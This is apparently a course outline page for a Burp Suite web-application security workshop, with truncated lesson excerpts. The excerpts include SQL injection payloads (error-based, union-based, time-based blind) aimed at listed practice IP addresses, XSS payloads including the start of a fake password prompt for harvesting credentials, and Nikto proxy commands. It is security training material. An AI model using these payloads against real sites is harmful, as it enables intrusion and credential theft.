Burp Suite Workshop

Or log in to access your purchased courses

Web App Security Testing & Burp Suite Fundamentals 

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with Skipfish
Integrating Burp with SQLMap

Day 2: Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation

Avatar
Course By

Joseph McCray

Lessons

C1L1: Course Materials

Author: Joseph McCray

Slides: https://s3.amazonaws.com/infosecaddictsfiles/WebAppSecIsNotEasyButCanBeSimple.pptx https://s3.amazonaws.com/infosecaddictsfiles/Burp+Suite.pptx Lab Manual: https://s3.amazonaws.com/infosecaddictsfiles/BurpSuite-Bootcamp-v1.pdf Day 1 Homework: Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities: https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the [...]

C1L2: Getting started with VMWare

Author: Joseph McCray

For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player. A 30-day trial of Workstation 11 can be downloaded from here:  https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0   A 30-day trial of Fusion 7 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0   The newest version of VMWare Player can be downloaded from here: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0   [...]

C1L3: Basic: Web Application Testing

Author: Joseph McCray

WEB APPLICATION TESTING Most people are going to tell you to reference the OWASP Testing guide. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. The key to doing a [...]

C1L4: SQL Injection

Author: Joseph McCray

https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx Another quick way to test for SQLI is to remove the paramter value Error-Based SQL Injection http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" [...]

C1L5: Union-Based SQL Injection

Author: Joseph McCray

http://54.213.252.28/bookdetail.aspx?id=2 order by 100-- http://54.213.252.28/bookdetail.aspx?id=2 order by 50-- http://54.213.252.28/bookdetail.aspx?id=2 order by 25-- http://54.213.252.28/bookdetail.aspx?id=2 order by 10-- http://54.213.252.28/bookdetail.aspx?id=2 order by 5-- http://54.213.252.28/bookdetail.aspx?id=2 order by 6-- http://54.213.252.28/bookdetail.aspx?id=2 order by 7-- http://54.213.252.28/bookdetail.aspx?id=2 order by 8-- http://54.213.252.28/bookdetail.aspx?id=2 order by 9-- http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9-- We are using a union select statement because we are joining the developer's query [...]

C1L6: Blind SQL Injection Testing

Author: Joseph McCray

BLIND SQL INJECTION TESTING Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER 3 - Total Characters http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds) Let's go for a quick check to see if [...]

C2L1: What is XSS

Author: Joseph McCray

WHAT IS XSS   https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx OK - what is Cross Site Scripting (XSS) 1. Use Firefox to browse to the following location: http://45.63.104.73/xss_practice/ A really simple search page that is vulnerable should come up. 2. In the search box type: <script>alert('So this is XSS')</script> This should pop-up an alert window with your message in it [...]

C2L2: A Better Way To Demo XSS

Author: Joseph McCray

XSS DEMO   Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box. Use Firefox to browse to the following location: http://40.86.183.118/xss_practice/ Paste this into the search box Option 1 <script> password=prompt('Your session is expired. Please enter your password to [...]

C3L1: Setting up Burp Suite

Author: Joseph McCray

Download latest free version of Burp at http://www.portswigger.net/burp/download.html Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run: java -jar burpsuite_free_v1.6.31.jar   Click the "Proxy" tab Click the "Options" sub-tab Click “Edit” in the “Proxy Listeners” section In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only.” In [...]

C3L2: Web Services

Author: Joseph McCray

WEB SERVICES   http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl Question 1: What is the process that you use when you test? Step 1: Automated Testing Step 1a: Web Application vulnerability scanners - Run two (2) unauthenticated vulnerability scans against the target - Run two (2) authenticated vulnerability scans against the target with low-level user credentials - Run two (2) authenticated [...]

C3L3: How much fuzzing is enough?

Author: Joseph McCray

There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. Step 1: Ask yourself the 3 questions per page of [...]

C4L1: Nikto with Burp in Linux

Author: Joseph McCray

NIKTO WITH BURP cd ~/toolz/ rm -rf nikto* git clone https://github.com/sullo/nikto.git Nikto2 cd Nikto2/program perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/   Masking the Nikto header reference: http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html